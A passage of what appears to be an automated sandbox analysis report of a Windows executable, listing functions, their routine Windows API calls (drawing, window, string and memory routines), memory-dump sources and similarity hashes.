                                      • Opcode ID: 64227a437cb31b995d12e57f0edaeb39f24ba93316eaf763517f2ecd1fea96e5
                                      • Instruction ID: beb7c48d639abde93f77ce5c0036600a359ec95fa13832f012975d2c4985a98c
                                      • Opcode Fuzzy Hash: 64227a437cb31b995d12e57f0edaeb39f24ba93316eaf763517f2ecd1fea96e5
                                      • Instruction Fuzzy Hash: 47E0483E80412666F7119768FC003E62554D7D9791F7541379F01822616B7CC8478BEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004011FE, Relevance: 9.2, APIs: 6, Instructions: 248COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8b3d72163a493a4d22e8ec3e49a5a339da07c6d5cf06789a74a8f99014e62561
                                      • Instruction ID: b66e4d598c86ad4f71ce10ea27c0b773a6d4f2007d18b37b04457ac92ab27136
                                      • Opcode Fuzzy Hash: 8b3d72163a493a4d22e8ec3e49a5a339da07c6d5cf06789a74a8f99014e62561
                                      • Instruction Fuzzy Hash: 24B12371E00218DBCB14DFA9C991BDEBBB5BF88304F1081AAE50AB7291DB346A45CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042DDB3, Relevance: 9.2, APIs: 6, Instructions: 231memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MapDialogRect.USER32(?,?), ref: 0042DE3E
                                      • SysAllocStringLen.OLEAUT32(?,00000000), ref: 0042DE5F
                                      • CLSIDFromString.OLE32(0000FFFC,?), ref: 0042DF4A
                                      • CLSIDFromProgID.OLE32(0000FFFC,?), ref: 0042DF52
                                      • SetWindowPos.USER32(00000004,?,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,?,?,0000FC84,00000000), ref: 0042DFEE
                                      • SysFreeString.OLEAUT32(?), ref: 0042E041
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: String$From$AllocDialogFreeProgRectWindow
                                      • String ID:
                                      • API String ID: 704962466-0
                                      • Opcode ID: 2c7c8883dafd529351ad48ac23e63801bdc4fe3f9fbfe131b7d46839deb3fe36
                                      • Instruction ID: 0c8e765037df8b0da75177545a34100ce6306607b724cd0097298645f45fa914
                                      • Opcode Fuzzy Hash: 2c7c8883dafd529351ad48ac23e63801bdc4fe3f9fbfe131b7d46839deb3fe36
                                      • Instruction Fuzzy Hash: BCA15B71E0021ADFDB00DFA5D984AEEB7B4FF08304F51412EE819A7351E7749A55CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00432B2F, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantClear.OLEAUT32(?), ref: 00432BD9
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C5A
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C69
                                      • SysFreeString.OLEAUT32(00000000), ref: 00432C78
                                      • VariantClear.OLEAUT32(?), ref: 00432C82
                                      • VariantClear.OLEAUT32(?), ref: 00432C93
                                        • Part of subcall function 00432358: VariantClear.OLEAUT32(00000007), ref: 004328B1
                                        • Part of subcall function 00432358: VariantClear.OLEAUT32(?), ref: 00432ABE
                                        • Part of subcall function 00434A8C: VariantCopy.OLEAUT32(?,?), ref: 00434A94
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Variant$Clear$FreeString$Copy
                                      • String ID:
                                      • API String ID: 3064640362-0
                                      • Opcode ID: 954d956b31b477e2ea17b671002bcd482803955b2a4e3fbc99098daf02d95ec2
                                      • Instruction ID: 7bb94790ebd446becceac3de6fc571204b9a9d1114fd1ce21a397d89f96dd6f3
                                      • Opcode Fuzzy Hash: 954d956b31b477e2ea17b671002bcd482803955b2a4e3fbc99098daf02d95ec2
                                      • Instruction Fuzzy Hash: FF516B71900209EFDB14DFA4C984BEEBBB8FF08304F14412AE116E7291D7B4A945CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043C86D, Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStringTypeW.KERNEL32(00000001,004614D0,00000001,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8AC
                                      • GetStringTypeA.KERNEL32(00000000,00000001,004614CC,00000001,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8C6
                                      • GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C8FA
                                      • MultiByteToWideChar.KERNEL32(0043796C,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0043796C,00000001,00000020,00000100,?,00000000), ref: 0043C932
                                      • MultiByteToWideChar.KERNEL32(0043796C,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0043796C,00000001,00000020,00000100,?), ref: 0043C988
                                      • GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0043796C,00000001,00000020,00000100,?), ref: 0043C99A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: StringType$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 3852931651-0
                                      • Opcode ID: 347e30dcb63d85e336433e665b79fdfd7dd9f8b5976e34a805e73d81635b2fac
                                      • Instruction ID: a8677c1b11a4e28ded07bce43afbed48718b2ab034e527602bf3a94c4d17b718
                                      • Opcode Fuzzy Hash: 347e30dcb63d85e336433e665b79fdfd7dd9f8b5976e34a805e73d81635b2fac
                                      • Instruction Fuzzy Hash: 32418EB1900619AFCF209F95CC85BEF3BB9EF0D751F144426FA15E6260D3389950CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004013D0, Relevance: 9.1, APIs: 6, Instructions: 114COMMON
                                      Download Yara Rule
                                      APIs
                                      • __ftol.LIBCMT ref: 0040141A
                                      • __ftol.LIBCMT ref: 00401446
                                      • _Smanip.LIBCPMTD ref: 00401464
                                      • _Smanip.LIBCPMTD ref: 0040147A
                                        • Part of subcall function 0044AC36: CreateSolidBrush.GDI32(?), ref: 0044AC58
                                        • Part of subcall function 0044ABE6: CreatePen.GDI32(?,00401104,00000000), ref: 0044AC0E
                                        • Part of subcall function 0044A53D: SelectObject.GDI32(?,00000000), ref: 0044A55F
                                        • Part of subcall function 0044A53D: SelectObject.GDI32(?,555AE900), ref: 0044A575
                                        • Part of subcall function 00401EC0: Pie.GDI32(00000000,0044F7AD,555AE900,4D8DFFFE,2281E8E0,?,?,00FF4242,00FF4242), ref: 00401EF9
                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 00401566
                                      • std::bad_exception::~bad_exception.LIBCMTD ref: 00401578
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CreateObjectSelectSmanip__ftolstd::bad_exception::~bad_exception$BrushSolid
                                      • String ID:
                                      • API String ID: 2865121653-0
                                      • Opcode ID: 668bb19c5485c8068c38e5566e1ccb51fbafa02bcf6630d7518076b64fcc33bf
                                      • Instruction ID: 04aacc64678d1c760d9e52228f79605db39123fb26d4e80a03fd2d4bd5697152
                                      • Opcode Fuzzy Hash: 668bb19c5485c8068c38e5566e1ccb51fbafa02bcf6630d7518076b64fcc33bf
                                      • Instruction Fuzzy Hash: 52511271E00218DBDB14DFA9C991BEEB7B5BF88300F108099E10AAB295DB306E85CF55
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044CE8D, Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TlsGetValue.KERNEL32(00471280,00471264,00000000,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CE98
                                      • EnterCriticalSection.KERNEL32(0047129C,00000010,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CEE7
                                      • LeaveCriticalSection.KERNEL32(0047129C,00000000,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CEFA
                                      • LocalAlloc.KERNEL32(00000000,00000004,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CF10
                                      • LocalReAlloc.KERNEL32(?,00000004,00000002,?,00471280,?,0044D0F5,00471264,00000000,?,00000000,0044C696,0044BFA0,0044C6B2,00448804,0044A2B4), ref: 0044CF22
                                      • TlsSetValue.KERNEL32(00471280,00000000), ref: 0044CF5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: AllocCriticalLocalSectionValue$EnterLeave
                                      • String ID:
                                      • API String ID: 4117633390-0
                                      • Opcode ID: 0de25c5ec96a3f8a85c39abde67682adc229e1a3fbc1a050a6df798080ba9777
                                      • Instruction ID: 82db8c0ac84b42f7c456ce424ce25d417691b87606232cfbe5b4884b67e0bb50
                                      • Opcode Fuzzy Hash: 0de25c5ec96a3f8a85c39abde67682adc229e1a3fbc1a050a6df798080ba9777
                                      • Instruction Fuzzy Hash: 2231CC31200705AFE764DF15C889F66B7F9FB44325F04852AF41AC7690EB78E809CBA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443090, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 004430B8
                                      • GetWindowTextLengthA.USER32(?), ref: 004430C2
                                      • GetWindowTextA.USER32 ref: 004430EA
                                      • SetTextColor.GDI32(?,00000000), ref: 0044312B
                                      • DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 00443143
                                      • SetTextColor.GDI32(?,?), ref: 00443155
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Text$ColorWindow$DrawLength
                                      • String ID:
                                      • API String ID: 1177705772-0
                                      • Opcode ID: e4f8b6037da8cb52fa2bf58fd9f8e8c3ace4a59f33b01e22b3fb1f9827787093
                                      • Instruction ID: 8ba6ee22ba21225c7dd55d4ed945e0a358bd402d7179dd40fa04216376d6d9d4
                                      • Opcode Fuzzy Hash: e4f8b6037da8cb52fa2bf58fd9f8e8c3ace4a59f33b01e22b3fb1f9827787093
                                      • Instruction Fuzzy Hash: EF214F76600208AFD714CF98DD84EBB77B9EB88712F14825AFD5997391CA34EE01CB64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044B58A, Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                      • String ID:
                                      • API String ID: 670545878-0
                                      • Opcode ID: 96968ea498528434dd6b43288ea13ab76f69d249a94d423d0dbaa6cc29fea2fd
                                      • Instruction ID: 246a7e99941b8f2adf9d4c330942d1de78a86abc8e34f05b9367c227154809fe
                                      • Opcode Fuzzy Hash: 96968ea498528434dd6b43288ea13ab76f69d249a94d423d0dbaa6cc29fea2fd
                                      • Instruction Fuzzy Hash: 91118232601322A7F7315A6A5C44B2BF698DF55B6AF060226ED01D3311DB78CC0286EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044AD21, Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$Rect$ClientCtrlLongScreen
                                      • String ID:
                                      • API String ID: 1315500227-0
                                      • Opcode ID: 34d06bd2a9273b6cb25b0f563afc0dc5beae5e0d68970119f53a210f8cf582f5
                                      • Instruction ID: d2551258cf798b7f5fd1eae1dfab7e6a68db31cd699830dc9efdf4154112a5c2
                                      • Opcode Fuzzy Hash: 34d06bd2a9273b6cb25b0f563afc0dc5beae5e0d68970119f53a210f8cf582f5
                                      • Instruction Fuzzy Hash: 2C01F27154061AABEB119B64DC08FEF376DEF05302F004132FC21D2170E734C9228BAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043A372, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 207timeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                        • Part of subcall function 00438FDC: LeaveCriticalSection.KERNEL32(?,004354B5,00000009,?,00000009,00000000,?,00435475,000000E0,00435462,?,00438F9B,00000018,00000000,?), ref: 00438FE9
                                      • GetTimeZoneInformation.KERNEL32(0000000C,00429BC6,0000000C,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80,00429BC6), ref: 0043A3C0
                                      • WideCharToMultiByte.KERNEL32(00000220,004716E4,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043A456
                                      • WideCharToMultiByte.KERNEL32(00000220,00471738,000000FF,0000003F,00000000,?,?,0000000B,0000000B,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043A48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                      • String ID: ,F$lF
                                      • API String ID: 3442286286-2452125446
                                      • Opcode ID: c933c93611ede7622a02233d4a43030aeb7bf075aa445f6c156a095f196eea8c
                                      • Instruction ID: fdd857715ab5b250e0da41b044d6261ea789cf330b4b7fc18113a1ce1a597965
                                      • Opcode Fuzzy Hash: c933c93611ede7622a02233d4a43030aeb7bf075aa445f6c156a095f196eea8c
                                      • Instruction Fuzzy Hash: 65610471644240AFD7259F6AAC85B663BE4FB0D314F18213FE0C5962E2E3B84991CB0F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044504E, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00445107
                                      • GetWindowLongA.USER32 ref: 00445118
                                      • GetWindowLongA.USER32 ref: 00445128
                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00445144
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID: (
                                      • API String ID: 2178440468-3887548279
                                      • Opcode ID: cfc1a28afa20f082c2dab0b4560dc7b1d48e41fc40cd5691601be503aa5a392c
                                      • Instruction ID: 53d0594416a0d312bce11af37c68001c305e2154efac2c1b0500241cfaa40d35
                                      • Opcode Fuzzy Hash: cfc1a28afa20f082c2dab0b4560dc7b1d48e41fc40cd5691601be503aa5a392c
                                      • Instruction Fuzzy Hash: BC31AF34600B049FEF20AF75C884B6EB7F5BF44714F15462EE54297692DB79E8048B98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044D72D, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 0044D75E
                                        • Part of subcall function 0044D84A: lstrlenA.KERNEL32(00000104,00000000,?,0044D78E), ref: 0044D881
                                      • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 0044D7FF
                                      • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 0044D82C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                      • String ID: .HLP$.INI
                                      • API String ID: 2421895198-3011182340
                                      • Opcode ID: 17e6fd48cdd33c5522bfe59f8e728cd046661e784031b116e9360ec72bce90df
                                      • Instruction ID: 49aa9f67b4690fae07ff6e31ea6bb8c6a147cc0cb8ac858bc3ff5172cafc0832
                                      • Opcode Fuzzy Hash: 17e6fd48cdd33c5522bfe59f8e728cd046661e784031b116e9360ec72bce90df
                                      • Instruction Fuzzy Hash: 6E3188B5804718AFEB20DF71D885BC6B7FCAB18304F10496BE195D3151EB74AA84CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043FC59, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000001,00000000,?,]C,?,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC88
                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,FFFFFFFF,00000000,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FC9B
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,FFFFFFFF,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCE7
                                      • CompareStringW.KERNEL32(?,?,00429A3B,FFFFFFFF,?,00000000,?,00000000,?,0043A363,00435D0D,?,?,?,00435B80), ref: 0043FCFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ByteCharMultiWide$CompareString
                                      • String ID: ]C
                                      • API String ID: 376665442-391739762
                                      • Opcode ID: 4f14520250a3c2f43a10a31574576f863b55bdf851653e98674810b73a6f6ace
                                      • Instruction ID: f1b6caffcbb91795f99dca17527fbd94d0cf750d774a684f50343bbd6e806959
                                      • Opcode Fuzzy Hash: 4f14520250a3c2f43a10a31574576f863b55bdf851653e98674810b73a6f6ace
                                      • Instruction Fuzzy Hash: 29212932D0024AEBCF218F94DC45ADEBFB5FF4C350F11416AFA1166260C3369925DB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00447DBC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 00447DFD
                                      • GetDlgItem.USER32 ref: 00447E1C
                                      • IsWindowEnabled.USER32(00000000), ref: 00447E27
                                      • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00447E3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$EnabledItemLongMessageSend
                                      • String ID: Edit
                                      • API String ID: 3499652902-554135844
